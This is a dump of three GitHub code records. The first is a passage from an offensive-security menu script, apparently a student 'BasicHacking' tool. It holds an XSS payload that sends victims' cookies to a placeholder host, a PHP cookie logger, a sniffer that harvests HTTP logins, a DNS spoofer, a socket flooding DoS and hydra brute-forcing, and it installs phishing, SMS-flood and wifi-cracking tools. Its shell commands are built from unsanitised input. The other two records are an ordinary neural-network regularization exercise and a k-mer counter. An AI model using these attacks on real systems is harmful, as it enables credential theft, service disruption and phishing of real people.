.\")\r\n os.system(\"sudo pip install -r doc/requirements.txt\")\r\n if x == \"2\":\r\n os.system(\"python3 spaghetti.py -h\")\r\ndef XSSattack():\r\n console = \"\"\"\r\n\r\n console.log(document.cookie)\r\n console.log(localStorage)\r\n\r\n \"\"\"\r\n exploit = \"\"\"\r\n var xmlHttp = new XMLHttpRequest();\r\n xmlHttp.open(\"GET\", 'https://XXXXXXXXX.com/register.php?cookie='+document.cookie);\r\n xmlHttp.send(null);\r\n \"\"\"\r\n PHP = \"\"\"\r\n <?php\r\n if(isset($_GET[\"cookie\"])){\r\n $file = fopen('victim.txt', 'a');\r\n fwrite($file, $_GET[\"cookie\"].\"\\n\");\r\n fclose($file);\r\n }\r\n \"\"\"\r\n scriptweb = \"\"\"\r\n <script type=\"text/javascript\">\r\n var test = '../example.php?cookie_data=' + escape(document.cookie);\r\n </script>\r\n\r\n \"\"\"\r\n print(\"exploit console:\" +exploit+\"\")\r\n print(\"\")#2\r\n print(\"PHP register:\"+PHP+\"\")\r\n print(\"\")#1\r\n print(\"Console:\"+console+\"\")\r\n print(\"\")#3#\r\n print(\"script in the web:\"+scriptweb+\"\")\r\n tipa = input(\"Do you want to install (Y , N or payloads):\")\r\n if tipa == \"Y\":\r\n os.system(\"git clone https://github.com/securityproject/web-app-pentesting\")\r\n os.system(\"mv web-app-pentesting/* .\")\r\n if tipa == \"N\":\r\n os.system(\"sudo python3 brutefxss.py\")\r\n if tipa == \"payloads\":\r\n tipar = input(\"do you want to install?(Y or N):\")\r\n if tipar == \"Y\": \r\n os.system(\"git clone https://github.com/farinap5/webpwn\")\r\n os.system(\"mv webpwn/* .\")\r\n if tipar == \"N\":\r\n print(\" Example:https://iesjuanramonjimenez.org/?s=Frances\")\r\n web = input(\"Print the website:\")\r\n os.system(\"sudo python3 webpwn.py \"+web+ \"\")\r\ndef VPN():\r\n __author__ = \"nil\"\r\n __copyright__ = \"nil\"\r\n __license__ = \"nil\"\r\n __version__ = \"nil\"\r\n __maintainer__ = \"nil\"\r\n __email__ = \"nil\"\r\n\r\n\r\n if len(sys.argv) != 2:\r\n print('usage: ' + sys.argv[0] + ' [country name | country code]')\r\n exit(1)\r\n country = sys.argv[1]\r\n\r\n if len(country) == 2:\r\n i = 6 # short name for country\r\n elif len(country) > 2:\r\n i = 5 # long name for country\r\n else:\r\n print('Country is too short!')\r\n exit(1)\r\n \r\n try:\r\n vpn_data = requests.get('http://www.vpngate.net/api/iphone/').text.replace('\\r','')\r\n servers = [line.split(',') for line in vpn_data.split('\\n')]\r\n labels = servers[1]\r\n labels[0] = labels[0][1:]\r\n servers = [s for s in servers[2:] if len(s) > 1]\r\n except:\r\n print('Cannot get VPN servers data')\r\n exit(1)\r\n \r\n desired = [s for s in servers if country.lower() in s[i].lower()]\r\n found = len(desired)\r\n print('Found ' + str(found) + ' servers for country ' + country)\r\n if found == 0:\r\n exit(1)\r\n \r\n supported = [s for s in desired if len(s[-1]) > 0]\r\n print(str(len(supported)) + ' of these servers support OpenVPN')\r\n # We pick the best servers by score\r\n winner = sorted(supported, key=lambda s: float(s[2].replace(',','.')), reverse=True)[0]\r\n print (\"\\n== Best server ==\")\r\n pairs = list(zip(labels, winner))[:-1] # zip() must be materialized before slicing in Python 3\r\n for (l, d) in pairs[:4]:\r\n print(l + ': ' + d)\r\n\r\n print(pairs[4][0] + ': ' + str(float(pairs[4][1]) / 10**6) + ' MBps')\r\n print(\"Country: \" + pairs[5][1])\r\n \r\n print (\"\\nLaunching VPN...\")\r\n _, path = tempfile.mkstemp()\r\n\r\n f = open(path, 'w')\r\n f.write(base64.b64decode(winner[-1]).decode()) # the config blob is base64 text; decode the bytes before writing to a text file\r\n f.write('\\nscript-security 2\\nup /etc/openvpn/update-resolv-conf\\ndown /etc/openvpn/update-resolv-conf')\r\n f.close()\r\n\r\n x = subprocess.Popen(['sudo', 'openvpn', '--config', path])\r\n\r\n try:\r\n while True:\r\n time.sleep(600)\r\n # termination with Ctrl+C\r\n except:\r\n try:\r\n x.kill()\r\n except:\r\n pass\r\n while x.poll() != 0:\r\n time.sleep(1)\r\n print ('\\nVPN terminated')\r\n\r\ndef bruteforce():\r\n print(\"sudo hydra -l [user] -P [location wordlist] [IP] [method]\")\r\n print(\"methods:telnet,http,https,ssh,FTP,SMTP[25],IMAP\")\r\n print(\"wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt\")\r\n print(\"type without sudo hydra\")\r\n print(\"Example: -l user -P wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt 255.255.255.0 http\")\r\n command = input (\">>>\")\r\n os.system(\"sudo hydra \"+command+ \"\")\r\n\r\ndef localflood():\r\n print(\"asegurese de que la carpeta contenga los archivos html para el texto\")\r\n print(\"seguido de esto utilice el comando [CD] para entrar en la carpeta\")\r\n print(\"por ultimo inserte el comando [python -m http.server --bind localhost --cgi [puerto normalmente 8080 o 8081]\")\r\n\r\n\r\ndef fastMeterpreter():\r\n print(\"1--> Download\")\r\n print(\"2--> Execute\")\r\n down = input(\"1 or 2:\")\r\n if down == \"1\":\r\n os.system(\"sudo apt install metasploit-framework gnome-terminal python3 python3-pip nc\")\r\n os.system(\"mv fastMeterpreter2/* .\")\r\n os.system(\"pip install -r requirements.txt\")\r\n if down == \"2\":\r\n os.system(\"sudo python3 fastMeterpreter2.py\")\r\n\r\ndef wifispeed():\r\n print(\"1--> Monitoreo grafico\")\r\n print(\"2--> Monitoreo en consola\")\r\n monitoreo = input(\"1 or 2:\")\r\n if monitoreo == \"1\":\r\n times = []\r\n download = []\r\n upload = []\r\n with open('test.csv', 'r') as csvfile:\r\n plots = csv.reader(csvfile, delimiter=',')\r\n next(csvfile)\r\n for row in plots:\r\n times.append(str(row[0]))\r\n download.append(float(row[1]))\r\n upload.append(float(row[2]))\r\n print(times, \"\\n\", download, \"\\n\", upload)\r\n plt.figure('speedtest', [30, 30])\r\n plt.plot(times, download, label='download', color='r')\r\n plt.plot(times, upload, label='upload', color='b')\r\n plt.xlabel('time')\r\n plt.ylabel('speed in Mb/s')\r\n plt.title(\"internet speed\")\r\n plt.legend()\r\n plt.savefig('test_graph.jpg', bbox_inches='tight')\r\n if monitoreo == \"2\":\r\n s = speedtest.Speedtest()\r\n while True:\r\n now = datetime.datetime.now().strftime(\"%H:%M:%S\") # renamed so it does not shadow the time module\r\n downspeed = round((round(s.download()) / 1048576), 2)\r\n upspeed = round((round(s.upload()) / 1048576), 2)\r\n print(f\"time: {now}, downspeed: {downspeed} Mb/s, upspeed: {upspeed} Mb/s\")\r\n\r\ndef passwordspeed():\r\n Hashcat = input(\"Do you have Hashcat installed?(Y or N):\")\r\n if Hashcat == \"N\":\r\n os.system(\"sudo apt-get install hashcat\")\r\n os.system(\"sudo hashcat -b\")\r\ndef goodkiller():\r\n print(\"1 -->>> download \")\r\n print(\"2 -->> Execute\")\r\n you = input(\"1 or 2:\")\r\n if you == \"1\":\r\n os.system(\"git clone https://github.com/FDX100/GOD-KILLER\")\r\n os.system(\"mv GOD-KILLER/* .\")\r\n os.system(\"sudo python3 install.py\")\r\n if you == \"2\":\r\n os.system(\"GOD-KILLER\")\r\ndef phoneinfoga():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n phoneinfoga = input(\"1 or 2:\")\r\n if phoneinfoga == \"1\":\r\n os.system(\"git clone https://github.com/sundowndev/PhoneInfoga\")\r\n os.system(\"mv PhoneInfoga/* .\")\r\n os.system(\"sudo python3 -m pip install -r requirements.txt --user\")\r\n os.system(\"sudo wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo tar xvfz geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo chmod +x geckodriver\")\r\n os.system(\"sudo export PATH=$PATH:/ruta-extraida/\")\r\n os.system(\"docker pull sundowndev/phoneinfoga:latest\")\r\n os.system(\"docker run --rm -it sundowndev/phoneinfoga --help\")\r\n if phoneinfoga == \"2\":\r\n print(\"EJ:(+51) 927742190\")\r\n phone = input(\"tlfn phone with the (+)>>>\")\r\n os.system(\"python3 phoneinfoga.py -n \"+phone+\"\")\r\ndef BTCanalizer():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n BTC = input(\"1 or 2:\")\r\n if BTC == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/btcAnalyzer\")\r\n os.system(\"mv btcAnalyzer/* .\")\r\n os.system(\"sudo apt-get install html2text bc -y\")\r\n if BTC == \"2\":\r\n print(\"-n transacciones totales\")\r\n print(\"-i identificador de la transaccion\")\r\n print(\"-a especificar la adress\")\r\n print(\"EJ: -e adress -a XXXXXXXXXXXXXXXXXX\")\r\n what = input(\"command:\")\r\n os.system(\"sudo ./btcAnalyzer \" +what+ \"\")\r\n\r\ndef wifiCrack():\r\n print(\" 1 -->> Download\")\r\n print(\" 2 -->> Execute\")\r\n wifi = input(\"1,2>>>\") # was input = input(...), which shadowed the builtin and compared an undefined name Wifi\r\n if wifi == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/wifiCrack\")\r\n if wifi == \"2\":\r\n os.system(\"sudo ./s4iPwnWifi.sh\")\r\n\r\ndef TPLINK():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n tplin = input(\"1 or 2:\")\r\n if tplin == \"1\": \r\n print(\"Wait a second...\")\r\n time.sleep(4)\r\n os.system(\"git clone https://github.com/vk496/linset\")\r\n os.system(\"mv linset/* .\")\r\n os.system(\"chmod +x linset\")\r\n if tplin == \"2\":\r\n os.system(\"./linset\")\r\ndef Ddoswifi():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n wifi = input(\"1 or 2:\")\r\n if wifi == \"1\":\r\n os.system(\"git clone https://github.com/palahsu/DDoS-Ripper\")\r\n os.system(\"mv DDoS-Ripper/* .\")\r\n if wifi == \"2\": \r\n print(\"_________________________________\")\r\n print(\"select de IP and the turbo(100-x/kB of your network\")\r\n print(\"_________________________________\")\r\n IP = input(\"IP victim:\")\r\n Port = input(\"PORT:\")\r\n turbo = input(\"turbo:\")\r\n os.system(\"sudo python3 DRipper.py -s \"+IP+\" -p \"+Port+\" -t \" +turbo+ \"\")\r\n\r\ndef Ufonet():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n ufo = input(\"1 or 2:\") # was input = input(...); the undefined name Ufo below could never match\r\n if ufo == \"1\":\r\n os.system(\"git clone https://github.com/epsylon/ufonet\")\r\n os.system(\"mv ufonet/* .\")\r\n os.system(\"sudo python3 setup.py install\")\r\n os.system(\"sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy libgeoip1 libgeoip-dev\")\r\n if ufo == \"2\":\r\n os.system(\"sudo python3 ./ufonet --gui \")\r\n time.sleep(5)\r\n webbrowser.open_new_tab(\"http://127.0.0.1:9999\")\r\ndef Phishing():\r\n customweb = input(\"Do you want to take a custom web?(Y or N):\")\r\n if customweb == \"Y\":\r\n URL = input(\"Enter the custom URL:\")\r\n os.system(\"wget \"+URL+\"\")\r\n print(\"downloading eviltrust...\")\r\n time.sleep(2)\r\n os.system(\"git clone https://github.com/s4vitar/evilTrust\")\r\n os.system(\"mv evilTrust/* .\")\r\n os.system(\"sudo bash evilTrust.sh\")\r\n if customweb == \"N\":\r\n os.system(\"git clone https://github.com/htr-tech/zphisher\")\r\n os.system(\"mv zphisher/* .\")\r\n os.system(\"sudo bash zphisher.sh\")\r\n\r\ndef checkSPY():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n spy = input(\"1 or 2:\") # was input = input(...); the undefined name SPY below could never match\r\n if spy == \"1\":\r\n os.system(\"git clone https://github.com/mvt-project/mvt\")\r\n if spy == \"2\":\r\n print(\"Recuerde conectar el telefono VIA USB\")\r\n print(\"Tambien Recuerde leer de arriba hacia abajo\")\r\n print(\"Android or IOS?\")\r\n sistem = input(\">>>\")\r\n if sistem == \"Android\":\r\n os.system(\"mvt-android check-adb\")\r\n os.system(\"mvt-android check-backup\")\r\n os.system(\"mvt-android check-bugreport\")\r\n os.system(\"mvt-android check-iocs\")\r\n print(\"Do you want to install The APK of MVT?\")\r\n nstall = input(\"Y or N?:\")\r\n if nstall == \"Y\":\r\n os.system(\"mvt-android download-apks\")\r\n if nstall == \"N\":\r\n print(\"press ctrl+C to exit\")\r\n time.sleep(1000000000000)\r\n if sistem == \"IOS\":\r\n os.system(\"mvt-ios check-backup\")\r\n os.system(\"mvt-ios check-fs\")\r\n os.system(\"mvt-ios check-iocs\")\r\n print(\"Do you want to install the Public Indicator?\")\r\n niostall = input(\"Y or N:\")\r\n if niostall == \"Y\":\r\n os.system(\"mvt-ios download-iocs\")\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\n if niostall == \"N\":\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\ndef sniffer():\r\n def sniff(interface):\r\n scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)\r\n\r\n def get_url(packet):\r\n return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path\r\n\r\n def get_login_info(packet):\r\n if packet.haslayer(scapy.Raw):\r\n load = packet[scapy.Raw].load.decode(errors=\"ignore\") # scapy returns bytes in Python 3\r\n keywords = [\"username\" , \"user\" , \"login\" , \"password\" , \"pass\"]\r\n for keyword in keywords:\r\n if keyword in load:\r\n return load \r\n def process_sniffed_packet(packet):\r\n if packet.haslayer(http.HTTPRequest):\r\n url = (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode() # fixed the HTTPRequesst/HTTPREQUEST typos\r\n print(url)\r\n print(\"[+] HTTP Request >>>\" + url)\r\n\r\n login_info = get_login_info(packet)\r\n if login_info:\r\n print(\"\\n\\n[+] Usuario y Contraseña Posibles >\"+ login_info + \"\\n\\n\")\r\n\r\n sniff(\"eth0\")\r\ndef DNSspoofer():\r\n dev = \"enp3s0f1\"\r\n filter = \"udp port 53\"\r\n file = None\r\n dns_map = {}\r\n\r\n def handle_packet(packet):\r\n ip = packet.getlayer(scapy.IP)\r\n udp = packet.getlayer(scapy.UDP)\r\n dns = packet.getlayer(scapy.DNS)\r\n\r\n # standard (a record) dns query\r\n if dns.qr == 0 and dns.opcode == 0:\r\n queried_host = dns.qd.qname[:-1].decode()\r\n resolved_ip = None\r\n\r\n if dns_map.get(queried_host):\r\n resolved_ip = dns_map.get(queried_host)\r\n elif dns_map.get('*'):\r\n resolved_ip = dns_map.get('*')\r\n\r\n if resolved_ip:\r\n dns_answer = scapy.DNSRR(rrname=queried_host + \".\",\r\n ttl=330,\r\n type=\"A\",\r\n rclass=\"IN\",\r\n rdata=resolved_ip)\r\n\r\n dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \\\r\n scapy.UDP(sport=udp.dport,\r\n dport=udp.sport) / \\\r\n scapy.DNS(\r\n id = dns.id,\r\n qr = 1,\r\n aa = 0,\r\n rcode = 0,\r\n qd = dns.qd,\r\n an = dns_answer\r\n )\r\n\r\n print(\"Send %s has %s to %s\" % (queried_host,\r\n resolved_ip,\r\n ip.src))\r\n scapy.send(dns_reply, iface=dev)\r\n\r\n\r\n def usage():\r\n print(sys.argv[0] + \" -f <hosts-file> -i <dev>\")\r\n sys.exit(1)\r\n\r\n\r\n def parse_host_file(file):\r\n for line in open(file):\r\n line = line.rstrip('\\n')\r\n\r\n if line:\r\n (ip, host) = line.split()\r\n dns_map[host] = ip\r\n\r\n try:\r\n cmd_opts = \"f:i:\"\r\n opts, args = getopt.getopt(sys.argv[1:], cmd_opts)\r\n except getopt.GetoptError:\r\n usage()\r\n\r\n for opt in opts:\r\n if opt[0] == \"-i\":\r\n dev = opt[1]\r\n elif opt[0] == \"-f\":\r\n file = opt[1]\r\n else:\r\n usage()\r\n\r\n if file:\r\n parse_host_file(file)\r\n else:\r\n usage()\r\n\r\n print(\"Spoofing DNS requests on %s\" % (dev))\r\n scapy.sniff(iface=dev, filter=filter, prn=handle_packet)\r\ndef DDOS():\r\n ip = input(\"IP:\")\r\n port = int(input(\"PUERTO:\")) # sockets need an integer port, input() gives a string\r\n hilos = int(input(\"Nº hilos>\"))\r\n def attack(): # the thread target below expects a function named attack\r\n while True:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, port))\r\n s.send(('GET /' + ip + ' HTTP/1.1\\r\\n\\r\\n').encode('ascii'))\r\n\r\n for _ in range(hilos):\r\n thread = threading.Thread(target=attack)\r\n thread.start()\r\ndef changeMAC():\r\n print(\"ponga la interfaz actual (eth0,wlan0)\")\r\n interfaz = input(\">>>\")\r\n os.system(\"macchanger -r \"+interfaz+\"\")\r\n\r\ndef WPSattack():\r\n print(\" TPLINK -->> 1\")\r\n print(\" Ddos -->> 2\")\r\n print(\" Linset(Rogue AP) -->> 3\")\r\n print(\" bruteforce -->>4\")\r\n tool = input(\"?:\")\r\n if tool == \"1\":\r\n TPLINK()\r\n if tool == \"2\":\r\n os.system(\"sudo chmod +x wifiDos.sh\")\r\n os.system(\"sudo bash wifiDos.sh\")\r\n if tool == \"3\":\r\n TPLINK() # linset is installed and launched by TPLINK(); there is no separate Linset()\r\n if tool == \"4\":\r\n wifiCrack() # the function is wifiCrack, not WifiCrack\r\n\r\n\r\n\r\nprint(\"DNSpoofer -->> remplaza un DNS haciendo que salga otra web\")\r\nprint(\"Godkiller -->> Floodea a un numero de telefono por linea directa y manda mensajes customizados\")\r\nprint(\"phoneinfoga -->> Saca la informacion de un numero de telefono\")\r\nprint(\"password speed -->> Check the password crack speed with Sha,MD5,NTLM,LM.etc\")\r\nprint(\"BTC -->> Visuiona las transacciones recientes y el saldo de una billetera BTC\")\r\nprint(\"Sniffer -->> captura los datos de las señales HTTP y recoge la contraseña junto al usuario\")\r\nprint(\" WPS -->> Ataques a diferentes redes wifi\")\r\nprint(\"Ufonet -->> ataque Dos o Ddos a una IP con distintos protocolos\")\r\nprint(\"Ddos -->> un simple ataque distribuido\")\r\nprint(\"XSS -->> realiza un escaneo/ataque en XSS\")\r\nprint(\"vulnerabilidades -->> realiza un escaner de vulnerabilidades con spaghetti\")\r\nprint(\" Phishing -->> Un ataque phisher que puede ser juntado con el DNS spoofer \")\r\nprint(\"checkSpyware --> Detecta los software maliciosos como por ejemplo PEGASUS\")\r\nprint(\"FMhack -->> Interfiere en las radiofrecuencias\")\r\nprint(\"GPS -->> una herramienta para calcular el sitio de un emisor por ondas de radio\")\r\nprint(\"changeIP -->> cambia tu direccion IP pubica con una VPN\")\r\nprint(\"Wifi speed -->> Monitorea la velocidad wifi(puede sertvir para comprobar la tasa de flood)\")\r\nprint(\"Localflood -->> floodea un wifi creando localhosts en diversos puertos\")\r\nprint(\"MAC -->> Cambia la mac del dispositivo, asi haciendolo indetectable\")\r\nprint(\"\")\r\nprint(\"para iniciar DNSspoofer y sniffer se debe iniciar primero:\")\r\nprint(\" sudo python3 arp-spoofer.py\")\r\nprint(\" sudo iptables -I FORWARD -j NFQUEUE --queue-num 0\")\r\nprint(\"en una consola aparte.Muchas Gracias ;D\")\r\n\r\n\r\n# the strings below match the menu names printed above, so the user can type them exactly\r\nthetool = input(\">\")\r\nif thetool == \"DNSpoofer\":\r\n DNSspoofer()\r\nif thetool == \"Godkiller\":\r\n goodkiller()\r\nif thetool == \"bruteforce\":\r\n bruteforce()\r\nif thetool == \"Wifi speed\":\r\n wifispeed()\r\nif thetool == \"phoneinfoga\":\r\n phoneinfoga()\r\nif thetool == \"password speed\":\r\n passwordspeed()\r\nif thetool == \"BTC\":\r\n BTCanalizer()\r\nif thetool == \"Sniffer\":\r\n sniffer()\r\nif thetool == \"Ddos\":\r\n DDOS()\r\nif thetool == \"Phishing\":\r\n Phishing()\r\nif thetool == \"GPS\":\r\n GPS()\r\nif thetool == \"Localflood\":\r\n localflood()\r\nif thetool == \"Ufonet\":\r\n Ufonet()\r\nif thetool == \"checkSpyware\":\r\n checkSPY()\r\nif thetool == \"FMhack\":\r\n FMhack()\r\nif thetool == \"MAC\":\r\n changeMAC()\r\nif thetool == \"changeIP\":\r\n VPN()\r\nif thetool == \"WPS\":\r\n WPSattack()\r\nif thetool == \"XSS\":\r\n XSSattack()\r\nif thetool == \"vulnerabilidades\":\r\n vulnerability()\r\n","repo_name":"mouse3/BasicHacking","sub_path":"HTC.py","file_name":"HTC.py","file_ext":"py","file_size_in_byte":22368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74483490612","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport 
scipy.io\n\nfrom deep_learning.initialization.init_utils import forward_propagation\nfrom deep_learning.regularization.reg_utils import load_2d_data_set, compute_cost, initialize_parameters, \\\n update_parameters, backward_propagation, predict, plot_decision_boundary, predict_dec, relu, sigmoid\nfrom deep_learning.regularization.test_case import compute_cost_with_regularization_test_case, \\\n backward_propagation_with_regularization_test_case, forward_propagation_with_dropout_test_case\n\n\ndef compute_cost_with_regularization(a3: np.ndarray, y: np.ndarray, parameters: dict, lam: float):\n W_sum = 0\n for k, v in parameters.items():\n if \"W\" in k:\n W_sum += np.sum(np.square(v))\n reg = lam * W_sum / (2 * y.shape[1])\n return compute_cost(a3, y) + reg\n\n\ndef backward_propagation_with_regularization(x: np.ndarray, y: np.ndarray, cache: list, lam: float):\n m = x.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n dZ3 = A3 - y\n dW3 = np.dot(dZ3, A2.T) / m + lam * W3 / m\n db3 = np.sum(dZ3, axis=1, keepdims=True) / m\n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = np.dot(dZ2, A1.T) / m + lam * W2 / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = np.dot(dZ1, x.T) / m + lam * W1 / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) / m\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef model(x, y, learning_rate=0.3, num_iterations=30000, print_cost=True, lam=0.0, keep_prob=1.0):\n \"\"\"\n Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.\n\n Arguments:\n X -- input data, of shape (input size, number of examples)\n Y -- true \"label\" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)\n learning_rate -- learning rate of the optimization\n num_iterations -- number of iterations of the optimization loop\n print_cost -- If True, print the cost every 10000 iterations\n lambd -- regularization hyperparameter, scalar\n keep_prob - probability of keeping a neuron active during drop-out, scalar.\n\n Returns:\n parameters -- parameters learned by the model. 
They can then be used to predict.\n \"\"\"\n\n grads = {}\n costs = [] # to keep track of the cost\n layers_dims = [x.shape[0], 20, 3, 1]\n\n # Initialize parameters dictionary.\n parameters = initialize_parameters(layers_dims)\n\n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n\n # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob >= 1:\n a3, cache = forward_propagation(x, parameters)\n else:\n a3, cache = forward_propagation_with_dropout(x, parameters, keep_prob)\n # Cost function\n if lam == 0:\n cost = compute_cost(a3, y)\n else:\n cost = compute_cost_with_regularization(a3, y, parameters, lam)\n\n # Backward propagation.\n assert (lam == 0 or keep_prob == 1) # it is possible to use both L2 regularization and dropout,\n # but this assignment will only explore one at a time\n if lam == 0 and keep_prob == 1:\n grads = backward_propagation(x, y, cache)\n elif lam != 0:\n grads = backward_propagation_with_regularization(x, y, cache, lam)\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(x, y, cache, keep_prob)\n\n # Update parameters.\n parameters = update_parameters(parameters, grads, learning_rate)\n\n # Print the loss every 10000 iterations\n if print_cost and i % 10000 == 0:\n print(\"Cost after iteration {}: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n\n # plot the cost\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n return parameters\n\n\ndef forward_propagation_with_dropout(x, parameters, keep_prob=0.5):\n np.random.seed(1)\n\n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n\n Z1 = np.dot(W1, x) + b1\n A1 = relu(Z1)\n D1 = np.random.rand(A1.shape[0], A1.shape[1])\n D1 = D1 < keep_prob\n A1 = A1 * D1 / keep_prob\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n D2 = np.random.rand(A2.shape[0], A2.shape[1])\n D2 = D2 < keep_prob\n A2 = A2 * D2 / keep_prob\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n return A3, cache\n\n\ndef backward_propagation_with_dropout(x, y, cache, keep_prob):\n m = x.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n\n dZ3 = A3 - y\n dW3 = 1. / m * np.dot(dZ3, A2.T)\n db3 = 1. / m * np.sum(dZ3, axis=1, keepdims=True)\n dA2 = np.dot(W3.T, dZ3)\n dA2 = dA2 * D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation\n dA2 = dA2 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1. / m * np.dot(dZ2, A1.T)\n db2 = 1. / m * np.sum(dZ2, axis=1, keepdims=True)\n\n dA1 = np.dot(W2.T, dZ2)\n dA1 = dA1 * D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation\n dA1 = dA1 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1. / m * np.dot(dZ1, x.T)\n db1 = 1. 
/ m * np.sum(dZ1, axis=1, keepdims=True)\n\n    return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n            \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n            \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef plot_regularization_l2():\n    train_x, train_y, test_x, test_y = load_2d_data_set()\n    parameters = model(train_x, train_y, lam=0.7)\n    print(\"On the train set:\")\n    predict(train_x, train_y, parameters)\n    print(\"On the test set:\")\n    predict(test_x, test_y, parameters)  # was predict(train_x, train_y, ...): the test metrics were computed on the training data\n\n    plt.title(\"Model with L2-regularization\")\n    axes = plt.gca()\n    axes.set_xlim([-0.75, 0.40])\n    axes.set_ylim([-0.75, 0.65])\n    plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\ndef plot_drop_out():\n    train_x, train_y, test_x, test_y = load_2d_data_set()\n\n    parameters = model(train_x, train_y, keep_prob=0.86, learning_rate=0.3)\n    print(\"On the train set:\")\n    predict(train_x, train_y, parameters)\n    print(\"On the test set:\")\n    predict(test_x, test_y, parameters)\n\n    plt.title(\"Model with dropout\")\n    axes = plt.gca()\n    axes.set_xlim([-0.75, 0.40])\n    axes.set_ylim([-0.75, 0.65])\n    plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\nplot_drop_out()\n","repo_name":"YaoIna/PythonStart","sub_path":"deep_learning/regularization/regularization.py","file_name":"regularization.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19478911784","text":"# Find the most frequent k-mers in a DNA string\n\nimport collections\n\n# Asking for the DNA string\n\ndna = input(\"DNA string?\")\nprint(\"Length of DNA string:\", len(dna))\n\n# Asking for the length of k\n\n\ndef input_k (message):\n    while True:\n        try:\n            user_input = int(input(message))\n        except ValueError:\n            print(\"Not a valid number.\")\n            print(\"Please enter a number!\")\n            continue\n        else:\n            return user_input\n            break\n\n\nk = input_k(\"Please enter the length of k:\")\n\n# Asking for the allowed error\n\n\ndef input_m(message):\n    while True:\n        try:\n            user_input = int(input(message))\n        except ValueError:\n            print(\"Not a valid number.\")\n            print(\"Please enter a number!\")\n            continue\n        else:\n            return user_input\n            break\n\n\nm = input_m (\"Please enter the allowed error:\")\n\n# Counting function\nin_mistake = m\nout_result = []\nkmer_list = []\n\n\ndef hamming_distance(s1, s2):\n    if len(s1) != len(s2):\n        raise ValueError()\n    else:\n        return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\n\nfor i in range(len(dna)-k + 1):\n    v = dna[i:i + k]\n    out_result.append(v)\n\n\nfor i in range(len(out_result) - 1):\n    for j in range(i+1, len(out_result)):\n        if hamming_distance(str(out_result[i]), str(out_result[j])) <= in_mistake:\n            kmer_list.extend([out_result[i], out_result[j]])\n\n\nkmer_count = collections.Counter(kmer_list).most_common(14)\n\nprint(\"Most frequent kmers:\", (kmer_count))\n\n\n\n","repo_name":"pnawrath/bioinfomatics","sub_path":"finding k-mers.py","file_name":"finding 